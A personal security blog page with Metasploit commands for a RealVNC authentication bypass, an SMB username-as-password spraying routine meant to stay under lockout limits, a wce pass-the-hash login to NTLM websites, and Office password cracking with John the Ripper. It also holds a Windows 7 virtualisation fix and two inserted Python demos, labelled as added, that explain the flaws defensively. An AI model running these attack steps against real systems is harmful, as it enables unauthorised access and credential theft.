<div dir="ltr"><b>break stuff majorly</b></div>
<div dir="ltr">These days I like to break stuff more than fix stuff.</div>
<div dir="ltr"><b>My New Blog!</b> (2018-10-09)</div>
<div dir="ltr">I've started a new blog, so head on over and check it out: <a href="https://jamesonhacking.blogspot.com/">https://jamesonhacking.blogspot.com/</a></div>
<div dir="ltr"><b>RealVNC Authentication Bypass</b> (2016-06-30)</div>
<div dir="ltr">
Metasploit's RealVNC authentication bypass module for CVE-2006-2369 is pretty fun because it's one of those that is way too easy. If a victim has a RealVNC server which is earlier than 4.1.2, or a LibVNCServer VNC server earlier than 0.8.2, a customized VNC client can send 'Type 1 - None' as the authentication type and completely bypass authentication. Metasploit does this for you.</div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGaGQIkkVK1tEleQ0nSazoUybYeSa_TxmaRe2ht6uUrC7wWeSJpOH9-qsCOKtw27FEyjk9rynjvzJReq5SCjuXzev-E22ujnLYW7ux3aUnwo6ticQJPH9w7KcyyOoJVc1ZRBEVrk90ADo/s1600/vnc01CCCC.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGaGQIkkVK1tEleQ0nSazoUybYeSa_TxmaRe2ht6uUrC7wWeSJpOH9-qsCOKtw27FEyjk9rynjvzJReq5SCjuXzev-E22ujnLYW7ux3aUnwo6ticQJPH9w7KcyyOoJVc1ZRBEVrk90ADo/s640/vnc01CCCC.PNG" /></a></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
This vulnerability was discovered by Steve Wiseman by accident while coding his own VNC software, so that's a fun fact. This is of course a very old vuln, but it still exists out there, unfortunately. Here are the commands to exploit it using msfconsole:</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b><i>use auxiliary/admin/vnc/realvnc_41_bypass</i></b><br />
<b><i>show options</i></b><br />
<b><i>set autovnc true</i></b><br />
<b><i>set rhost <target-victim></i></b><br />
<b><i>run</i></b></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
At this point, Metasploit should automatically launch a VNC client and remote to the host while bypassing authentication. Fun stuff.</div>
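<div dir="ltr">The bypass described above works because the server accepts whatever security type the client names, even one it never offered. The following is an added example (not from the post and not Metasploit's module) that parses a captured RFB 3.7/3.8 security negotiation and flags a client choosing a type the server did not offer; the function names and the sample byte strings are constructed for the demonstration.</div>

```python
"""Check a captured RFB (VNC) security handshake for the CVE-2006-2369 pattern.

Added example, not from the blog post or from Metasploit. It parses the
RFB 3.7/3.8 negotiation (ProtocolVersion, the server's list of offered
security types, then the client's one-byte choice) and flags a client that
selects a type the server never offered. Sample bytes are constructed.
"""
import re

# Security-type numbers from the RFB protocol specification (subset).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}

VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")


def parse_version(msg: bytes):
    """Return (major, minor) from a 12-byte RFB ProtocolVersion message."""
    m = VERSION_RE.match(msg)
    if not m:
        raise ValueError("not an RFB ProtocolVersion message: %r" % msg)
    return int(m.group(1)), int(m.group(2))


def parse_server_security_types(msg: bytes):
    """RFB 3.7+: one count byte followed by that many security-type bytes.
    A count of 0 means the server refused the connection (a reason follows)."""
    if not msg:
        raise ValueError("empty server security message")
    count = msg[0]
    if count == 0:
        return []
    types = list(msg[1:1 + count])
    if len(types) != count:
        raise ValueError("truncated security-type list")
    return types


def check_handshake(server_version: bytes, server_security: bytes,
                    client_choice: bytes) -> dict:
    """Classify one negotiation. Verdicts:
      'server-dictated'  RFB 3.3: the server picks, the client sends no choice
      'ok'               the client chose something the server offered
      'none-offered'     the server itself offers type 1 (None): a config finding
      'bypass-attempt'   the client chose a type the server never offered;
                         forcing type 1 (None) is the RealVNC 4.1.1 bypass
    """
    major, minor = parse_version(server_version)
    if (major, minor) < (3, 7):
        return {"offered": [], "chosen": None, "verdict": "server-dictated"}
    offered = parse_server_security_types(server_security)
    if len(client_choice) != 1:
        raise ValueError("client security-type choice must be exactly one byte")
    chosen = client_choice[0]
    if chosen in offered:
        verdict = "none-offered" if chosen == 1 else "ok"
    else:
        verdict = "bypass-attempt"
    return {"offered": offered, "chosen": chosen, "verdict": verdict,
            "chosen_name": SECURITY_TYPES.get(chosen, "unknown")}


# Constructed sample exchanges (not real captures).
SERVER_VERSION_38 = b"RFB 003.008\n"
SERVER_VERSION_33 = b"RFB 003.003\n"
OFFERS_VNCAUTH_ONLY = bytes([1, 2])         # count=1, type 2 (VNC Authentication)
OFFERS_NONE_AND_VNCAUTH = bytes([2, 1, 2])  # count=2, types 1 and 2

if __name__ == "__main__":
    # A client answering 0x01 to a server that only offered type 2 is the bypass pattern.
    print(check_handshake(SERVER_VERSION_38, OFFERS_VNCAUTH_ONLY, b"\x01"))
```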
<div dir="ltr">
<br /></div>
<div dir="ltr">
Links:<br />
<a href="http://www.tenable.com/plugins/index.php?view=single&id=21564" target="_blank">http://www.tenable.com/plugins/index.php?view=single&id=21564</a><br />
<a href="https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS" target="_blank">https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS</a><br />
<a href="http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/" target="_blank">http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div dir="ltr"><b>Metasploit: Find Usernames Used As Passwords</b> (2016-05-28)</div>
<div dir="ltr">
In an internal pen test, there are cases where you have pulled a list of domain usernames but are still looking to get the password for one of these accounts. One possible technique for accomplishing this would be to use Metasploit to identify any passwords which are the same as the username. Below are steps to use the Metasploit console (msfconsole) to perform this particular type of password attack. And here's a pretty picture of a test box performing such an attack on itself, just as an example:<br>
<br></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiH_Rgd34VCJrTcijhZJbuofxnB0gwsYwuPEhmjXGBupERCShWJGJbHqtCONxvZ6uBp5lz74TeWmi25HOTRDsu45AOXaRtrxiJ2Q7r6EmtHSUXG6s083eMbuakytKxQOfo4jYNandb3_0/s400/image001.png" style="color: #0000ee; font-family: sans-serif; margin-left: auto; margin-right: auto; text-align: center;" width="400"></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example attack</td></tr>
</tbody></table>
</div>
<br>
<div dir="ltr">
</div>
<div dir="ltr">
Instructions:</div><div dir="ltr"><br></div>
<div dir="ltr">
1. Put your list of usernames into a text file with one username per line, and place the file in the Metasploit directory.</div><div dir="ltr"><br></div>
<div dir="ltr">
2. Open the Metasploit console and run: <i><b>use auxiliary/scanner/smb/smb_login</b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
3. Pick one domain workstation to test against and set it in MSF (Metasploit): <i><b>set RHOSTS <ip-address></b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
4. Tell MSF the domain name: <b><i>set SMBDomain <domain></i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
5. Tell MSF the name of the file containing the usernames: <b><i>set USER_FILE <filename></i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
6. Tell MSF to use the username as the password: <b><i>set USER_AS_PASS true</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
7. For some reason MSF doesn't like to run USER_AS_PASS unless you explicitly specify another password or password list as well. If you don't do this, it will run the module but not actually test the username as the password. Just pick a random weak password to also test for, like this: <i><b>set SMBPass password123</b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
8. If you know the password policy will allow three login failures without causing a lockout, consider also testing for blank passwords: <b><i>set BLANK_PASSWORDS true</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
9. Then run the exploit with: <b><i>run</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
One of the things I like about this method is that it's not as loud as a full brute force. As long as you keep below the lockout policy, you may be able to stay under the radar completely, while still testing every single domain user. When the test is complete, you can see what kind of creds you got with this command: <b><i>creds</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
To export the creds as a file, you can use: <i><b>creds -o <filename.txt></b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
To get help with the creds command, use: <i><b>creds -h</b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">To list all possible options for the attack, use: <i style="font-family: sans-serif;"><b>show options</b></i></div><div dir="ltr"><br></div><div dir="ltr">
After getting a domain user's creds, the next step will often be to authenticate with these creds to various computers and run mimikatz. If you run mimikatz on enough workstations, you're bound to eventually find one that will yield domain admin creds, resulting in red team happiness.</div><div dir="ltr"><br></div>
<div dir="ltr">
Ciao!</div><div dir="ltr"><br></div><div dir="ltr"><br></div>
<div dir="ltr"><b>P2V Windows 7: BSOD Solution</b> (2016-04-04)</div>
For whatever reason, when performing a P2V on a Windows 7 machine, you are very likely to experience a BSOD, even if you use VMware Converter. There is a painless workaround, however, using a combination of Sysinternals Disk2vhd and StarWind V2V Converter. In my case, after using these tools, I also had to make some registry edits with an offline registry editor in order to resolve the BSOD. The steps are actually quite easy, though it took me a while to figure them out.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8nNTSAXeufbFKsjr-962bPSiSvun4JumMLh3sFTFOhTlb68UdLE5db7Yv3DfEFZRoH04lXOwXXcyNKvzCkSydTTQ2cn5z1ud8a-MB29iKnooaJvOEImTiV5-SOq6vGd8YfLGGK3oudM/s1600/starwind1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8nNTSAXeufbFKsjr-962bPSiSvun4JumMLh3sFTFOhTlb68UdLE5db7Yv3DfEFZRoH04lXOwXXcyNKvzCkSydTTQ2cn5z1ud8a-MB29iKnooaJvOEImTiV5-SOq6vGd8YfLGGK3oudM/s400/starwind1.png" width="400" /></a></div>
<br />
<br />
Before I give you the how-to, I want to say I'm very thankful to <a href="http://itknowledgeexchange.techtarget.com/information-technology/windows-7-p2v-for-esxvmware-workstation/" target="_blank">these</a> <a href="http://www.bauer-power.net/2010/12/how-to-p2v-windows-7-for-use-in-vmware.html" target="_blank">two</a> bloggers for the information on the aforementioned tools, and also thankful to various forum posters from whom I got the needed registry settings. Today's post is meant to gather the various information I used into one resource and relate my experience. Also, the offline registry edit I did from a live (virtual) CD may be useful information to some. Here are the steps I used to P2V my Windows 7 Pro 64-bit machine so that it could be used in VMware Workstation Player:<br />
<br />
1. Download and run <a href="http://technet.microsoft.com/en-ca/sysinternals/ee656415.aspx" target="_blank">Disk2vhd</a> on the Windows 7 physical machine you want to convert.<br />
<br />
<div>
2. The Disk2vhd interface is very simple. Just be sure to set it to vhd (not vhdx, which would be for Windows 8) and let it do its thang.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJKLVx-f5zxiZ_frYm8tiOERiJLFOTuPO5GUupw1MNRM3HedJovP6B4Z1AZREogKnGQMjbe7R69_ErJMzBuXpyaK-a5w2vr8Z9-xK41PJXEkW4r1UkQkIwAQLOctZFbyXU4ijMWI0KAo/s1600/disk2vhd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJKLVx-f5zxiZ_frYm8tiOERiJLFOTuPO5GUupw1MNRM3HedJovP6B4Z1AZREogKnGQMjbe7R69_ErJMzBuXpyaK-a5w2vr8Z9-xK41PJXEkW4r1UkQkIwAQLOctZFbyXU4ijMWI0KAo/s400/disk2vhd.png" width="400" /></a></div>
<br />
<br /></div>
<div>
3. Download, install and run <a href="https://www.starwindsoftware.com/converter" target="_blank">StarWind V2V Converter</a>. (They make you fill out a contact form and then they send you a download link. Or, you may be able to get <a href="https://www.starwindsoftware.com/tmplink/StarWindConverter.exe" target="_blank">this</a> link to work, so you don't have to. :) )</div>
<div>
</div>
<div>
</div>
<div>
4. Use StarWind V2V Converter to convert your vhd to a vmdk and copy the resulting vmdk to your host machine. It has a very simple interface.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3qWlz8Ixmtw69ExGsacK9f-D1wolwNx8k8k66gYZITOLBuii5hyphenhypheneU7r8m6d7hkFChHnJWN3SOJ4Ix3VphX2uRQpX4WWstwu958YIOTce5LoQrz8LunAGq1KBjV0-I10Jkegi26Gc34Y/s1600/starwind2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3qWlz8Ixmtw69ExGsacK9f-D1wolwNx8k8k66gYZITOLBuii5hyphenhypheneU7r8m6d7hkFChHnJWN3SOJ4Ix3VphX2uRQpX4WWstwu958YIOTce5LoQrz8LunAGq1KBjV0-I10Jkegi26Gc34Y/s400/starwind2.png" width="400" /></a></div>
<br /></div>
<div>
5. Open VMware Workstation Player and create a new Windows 7 virtual machine. Before powering it on, however, remove the hard drive and replace it with the vmdk created above.</div>
<div>
<br /></div>
<div>
6. Power on the VM. In my case, at this point I still got a BSOD and was considering giving up. If this is you, read on...</div>
<div>
<br /></div>
<div>
7. You're going to have to make some offline registry edits on your unbootable system. You could do this by connecting the VM's virtual hard drive to another Windows VM (google it), but my preference was to boot the VM to AVG Rescue CD. Just download <a href="http://www.avg.com/us-en/download.prd-arl">AVG Rescue CD</a> and boot your VM to the ISO.<br />
<br />
8. Choose the registry editor in the AVG Rescue CD menu under Utilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrNcRv2EbsCD0pLA5k6ZFBw0pjYG-0VKLk43UyCxGiL90ncHz_tmg2j1VJtcKRbXsPYn-_bEsyvwfs0nRHVMRXX6BHJhdRRSzFkHoX8skIjkaEKl6zq-NUCWZbGoRQ1J_pA_AxW3rgjQ/s1600/avgrescue.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrNcRv2EbsCD0pLA5k6ZFBw0pjYG-0VKLk43UyCxGiL90ncHz_tmg2j1VJtcKRbXsPYn-_bEsyvwfs0nRHVMRXX6BHJhdRRSzFkHoX8skIjkaEKl6zq-NUCWZbGoRQ1J_pA_AxW3rgjQ/s400/avgrescue.PNG" width="400" /></a></div>
<br />
<br />
9. Navigate to HKLM\SYSTEM\ControlSet[001]\services\<br />
<br />
10. In my case, I was able to fix the problem by setting each of the following to a value of 0:<br />
<br />
HKLM\SYSTEM\ControlSet[001]\services\LSI_SAS\Start<br />
HKLM\SYSTEM\ControlSet[001]\services\LSI_SAS2\Start<br />
<br />
However, reading online, it appears that some users with different drivers had to make other registry changes under HKLM\SYSTEM\ControlSet[001]\services\. Here are some of the other edits I saw on various forums:<br />
<br />
Aliide\Start = 3<br />
Amdide\Start = 3<br />
Atapi\Start = 0<br />
Cmdide\Start = 3<br />
iaStorV\Start = 3<br />
intelide\Start = 0<br />
msahci\Start = 3<br />
pciide\Start = 3<br />
viaide\Start = 3<br />
<br />
Do not make these updates unless you know what you are doing. Consider writing down the current settings before making any changes so you can revert if needed.<br />
<br />
11. As soon as I made the LSI_SAS\Start and LSI_SAS2\Start registry edits and booted back into the native/guest OS, it started working!<br />
<br /></div>
<div>
<br /></div>
<div>
Specs:</div>
<div>
Host OS: lubuntu 14.04.4 64-bit</div>
<div>
Guest OS: Windows 7 Pro 64-bit<br />
Live CD: AVG Rescue CD ( <a href="http://www.avg.com/us-en/download.prd-arl">avg_arl_cdi_all_120_150814a10442.iso</a> )<br />
VMware Workstation 12 Player</div>
<br />
<div>
<br /></div>
<br />
<div dir="ltr"><b>Passing an NTLM Hash to the Browser</b> (2015-09-16)</div>
<div dir="ltr">
In some scenarios, an attacker may have been able to extract Active Directory password hashes but has not been able to successfully crack some or all of them. In this case, it may be possible to perform authentication by merely passing the hash itself, instead of the password. The specific focus of this post is a pass-the-hash attack on a website which uses NTLM authentication.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SSmB31zONMTi2-x38DJUKzey8TPRvjxRxrpoMpylUZvN-VmdOkDumbtOtaEOna-_dIFZ44-8A5AJ-ln0CYHxbNbz09VsMg5aPjlSktCDZuZqTMZKny4ksno8KbydWlItedeUjh6QLZc/s1600/wce2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SSmB31zONMTi2-x38DJUKzey8TPRvjxRxrpoMpylUZvN-VmdOkDumbtOtaEOna-_dIFZ44-8A5AJ-ln0CYHxbNbz09VsMg5aPjlSktCDZuZqTMZKny4ksno8KbydWlItedeUjh6QLZc/s400/wce2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to zoom)</td></tr>
</tbody></table>
<br />
<br /></div>
<div dir="ltr">
Under normal circumstances, a user might pull up Internet Explorer and browse to the website which uses NTLM authentication. At that point, if this user is not a domain user, they would typically get a prompt for a username and password. If the user who is logged into the computer is a domain user, they would potentially be logged in automatically using the Windows credentials of the current login session. In our attack scenario, the attacker has already extracted the victim user's password hash (but not the actual password) and will use it for login. The attacker is logged into Windows with credentials which do not allow them access to the website in question. However, the attacker passes the hash to the current Windows session in order to impersonate the victim user. The attacker then browses to the website using Internet Explorer and is able to authenticate automatically without ever needing the password itself - only the hash. This attack can take place from any computer which is able to access the website. If the website is only accessible internally, as many such NTLM pages are, then the attacker would need access to a computer located on the LAN. However, if the website is accessible from the Internet, the attacker could perform the pass-the-hash attack from a remote location outside the network, depending on the individual circumstances. Below are the details of the attack.<br />
<br /></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
<b>TL;DR:</b><br />
Use <a href="https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip">wce</a></div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>Prerequisites:</b><br />
Extracted hash (extraction process not covered in this post)<br />
Windows computer to perform the attack from<br />
Target website which uses NTLM authentication<br />
Connectivity to the website<br />
wce (Windows Credentials Editor)</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>wce download link:</b><br />
<a href="https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip">https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip</a> (expect browser/AV blocking)</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>Tested on:</b><br />
Windows 7, 64 bit<br />
Internet Explorer 11, 64 bit<br />
wce v1.4beta x64 (Windows Credentials Editor)</div>
<div dir="ltr">
<b><br /></b>
<b><br />Steps:</b><br />
1. Log onto the Windows computer which will be used for the attack<br />
2. Configure Internet Options:<br />
a. Security>Custom level for the zone>Automatic logon only in intranet zone<br />
b. Add website to Local Intranet sites<br />
3. Run wce, give it the hash and tell it to call IE: <b>wce -s <UserName>:<DomainName>:<LMHash>:<NTHash> -c "C:\Program Files\Internet Explorer\iexplore.exe"</b><br />
4. Browse to the website for the automatic login</div>
<div dir="ltr">
<br />
As you can see, the attack is very simple. Here are the wce command line switches in use:</div>
<div dir="ltr">
<br />
-s Changes NTLM credentials of current logon session. Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.<br />
-c Run <cmd> in a new session with the specified NTLM credentials.<br />
<br />
<br /></div>
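<div dir="ltr">The reason the hash alone is enough is in the protocol itself: in NTLMv2 the NT hash is the only secret that goes into the response, and the server verifies with nothing more than that same stored hash. The following is an added example (not from the post and not wce's code) that carries the MS-NLMP NTOWFv2 and NTProofStr computation through on both the client and the verifier side with the NT hash as the sole input; the function names are mine and every hash, challenge and name is a constructed test value.</div>

```python
"""Why a pass-the-hash attack works against NTLM authentication.

Added example, not from the blog post and not wce's code. It carries the
NTLMv2 response computation from MS-NLMP (NTOWFv2 and NTProofStr) through
with the NT hash as the only secret, and shows that the verifier needs the
very same hash: a stolen NT hash is a password-equivalent, which is why the
fix is to retire NTLM (move to Kerberos) rather than to rotate a password.
All hashes, challenges and names below are constructed demo values.
"""
import hashlib
import hmac


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); MS-NLMP 3.3.2."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(ntowf2: bytes, server_challenge: bytes, temp: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    return hmac.new(ntowf2, server_challenge + temp, hashlib.md5).digest()


def build_temp(client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """The 'temp' blob: RespType=1, HiRespType=1, Z(6), 8-byte FILETIME,
    8-byte client challenge, Z(4), AV pairs (target info), Z(4)."""
    return (b"\x01\x01" + b"\x00" * 6 + timestamp.to_bytes(8, "little")
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_response(nt_hash, user, domain, server_challenge, client_challenge,
                    timestamp, target_info) -> bytes:
    """What the client sends in the AUTHENTICATE message: NTProofStr || temp.
    Nothing here ever touches the clear-text password."""
    temp = build_temp(client_challenge, timestamp, target_info)
    return nt_proof_str(ntowf_v2(nt_hash, user, domain), server_challenge, temp) + temp


def server_verify(nt_hash, user, domain, server_challenge, response) -> bool:
    """The verifier (DC or local SAM) also needs only the stored NT hash:
    it recomputes NTProofStr over the received temp and compares in constant time."""
    proof, temp = response[:16], response[16:]
    expected = nt_proof_str(ntowf_v2(nt_hash, user, domain), server_challenge, temp)
    return hmac.compare_digest(proof, expected)


# Constructed demo values (a made-up NT hash, not derived from any real password).
DEMO_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
DEMO_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
DEMO_CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")
# One AV pair: MsvAvNbDomainName (id 2, len 12) = "Domain", then MsvAvEOL.
DEMO_TARGET_INFO = b"\x02\x00\x0c\x00" + "Domain".encode("utf-16-le") + b"\x00\x00\x00\x00"


def demo() -> bool:
    """Round trip: a response built from the hash alone verifies against the hash alone."""
    resp = client_response(DEMO_NT_HASH, "User", "Domain", DEMO_SERVER_CHALLENGE,
                           DEMO_CLIENT_CHALLENGE, 0, DEMO_TARGET_INFO)
    return server_verify(DEMO_NT_HASH, "User", "Domain", DEMO_SERVER_CHALLENGE, resp)


if __name__ == "__main__":
    print("verified with hash only:", demo())
```

The take-away for the SharePoint case at the end of the post is that any NTLM-protected endpoint is only as safe as every place that NT hash is stored.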
<div dir="ltr">
Hmm...Maybe it's time to re-think that SharePoint NTLM authentication.<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
<div dir="ltr"><b>Cracking Microsoft Office File Passwords</b> (2015-09-09)</div>
The best way to crack the password on a Microsoft Office file is to first extract the hash of the actual password itself. But how do you do that? The script office2john.py is really useful for this. It extracts the password hash and converts it to a format that John the Ripper can handle. This is not a tutorial on John, so you'll have to hit up google for that, but I'll give you the basic commands to get the job done. This should work on files from pretty much any version of Office, including xls and xlsx, etc. (Office 2003-2013).<br />
<br />
First, you'll need to download office2john.py. You can get it from github <a href="https://github.com/kholia/RC4-40-brute-office" target="_blank">here</a>. Or, you can download a copy I put <a href="https://drive.google.com/file/d/0B2G7-0pXZll4a0lyM0xlbHoxVVU/view?usp=sharing&resourcekey=0-5J9kQX1jSUMPEPzY1Jw55g" target="_blank">here</a>.<br />
<br />
Depending on your cracking strategy, you will likely also need a dictionary file for the attack. I will be using a dummy dictionary file as PoC, but there are lots out there and I won't go into that as a part of this post.<br />
<br />
You'll of course also need John installed (google it) and will need a target Office file. I'm doing this from Kali 2.0 on an Excel 2013 test file which I encrypted with a password from Excel. Here are the files/names I used:<br />
<br />
dictionary.lst (dictionary file)<br />
office2john.py (extracts hash)<br />
test-crack.xlsx (target)<br />
<br />
Okay, here we go. First, we extract the hash:<br />
<br />
<b>./office2john.py test-crack.xlsx > test-crack-hash.txt</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5Ntlp6raEZ0V9EQKoCa3chODMRhCOYhGbPS9gcTJDY2PiTN6GBc27zkq4LEqxGRmU-edsHem_XfIi_2dFVASh1962NYMub0fkDalGNnjAu7n2spDDbP9KjpKCT17c3yeMxDFOtEcNCg/s1600/xlsx-crack-B3.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5Ntlp6raEZ0V9EQKoCa3chODMRhCOYhGbPS9gcTJDY2PiTN6GBc27zkq4LEqxGRmU-edsHem_XfIi_2dFVASh1962NYMub0fkDalGNnjAu7n2spDDbP9KjpKCT17c3yeMxDFOtEcNCg/s400/xlsx-crack-B3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to zoom)</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
The hash has now been written to test-crack-hash.txt and we can begin cracking. The method I used was a dictionary attack:<br />
<br />
<b>john --session=xlsx --rules --wordlist=dictionary.lst test-crack-hash.txt</b><br />
<br />
Here is an explanation of the command line options used:<br />
<br />
<i>--session=</i><br />
<i>An optional identifier for you to manage the John session, in case you have multiple sessions. You can make the string after the equals sign be whatever you want.</i><br />
<i><br /></i>
<i>--rules</i><br />
<i>Enables wordlist rules</i><br />
<i><br /></i>
<i>--wordlist=</i><br />
<i>The dictionary file to use for the attack.</i><br />
<i><br /></i>
<i>[filename]</i><br />
<i>The last parameter is the text file containing the extracted hash.</i><br />
<br />
It should show the password when it completes, if your cracking was successful. You can also run the following to show the cracked password, after it completes: <b>john --show test-crack-hash.txt</b><br />
<br />
Now you should be able to open the Office file using the password you cracked. It goes without saying that this should only be used for ethical purposes, so don't do evil stuff!<br />
<br />
Ciao!<br />
<br />
<br />
<br />
<br />
<br />
<div dir="ltr"><b>Installing Kali via YUMI</b> (2015-08-30)</div>
I like to use <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/" target="_blank">YUMI</a> to maintain a USB thumb drive with various live operating systems and installers, including Kali. I generally prefer this over the <a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank">dd image method</a>. From time to time, I run into trouble with operating systems which aren't immediately compatible, but can often find a resolution. This was the case with Kali 2.0. I could boot into the installer, but the installer itself would fail to detect the installation media. This caused the installer to fail completely. Here are the screenshots - you can click to zoom.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYIRyeR1tx_PnRqYgtYP4o68cIIwN3CKY1RcIO8m1EPV_v5ha5VRF2qKOiGKVSj_XLkiwTuHZGvtbRCsYsooR86q6YCH3wjpob3yAhDBaCcJX_LeMQKfKOh2eTLwUfTwRnu2huVd8Qqg/s1600/cdrom-detect_retry_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYIRyeR1tx_PnRqYgtYP4o68cIIwN3CKY1RcIO8m1EPV_v5ha5VRF2qKOiGKVSj_XLkiwTuHZGvtbRCsYsooR86q6YCH3wjpob3yAhDBaCcJX_LeMQKfKOh2eTLwUfTwRnu2huVd8Qqg/s400/cdrom-detect_retry_0.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxlOI5fyO3syKNnRoFe24btK_ZK9-_igPU0gJJZfgx9XHCWBqSipRp2012mM3PK_z6O5uq8evl2CZdgcxr6mSy6w5w8iC_y_t6q6LjKYQCwKgHAzFCZLf88NfHKrj6oVg7iRKSgmeXeY/s1600/debian-installer_main-menu_item-failure_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxlOI5fyO3syKNnRoFe24btK_ZK9-_igPU0gJJZfgx9XHCWBqSipRp2012mM3PK_z6O5uq8evl2CZdgcxr6mSy6w5w8iC_y_t6q6LjKYQCwKgHAzFCZLf88NfHKrj6oVg7iRKSgmeXeY/s400/debian-installer_main-menu_item-failure_0.png" width="400" /></a></div>
<br />
<br />
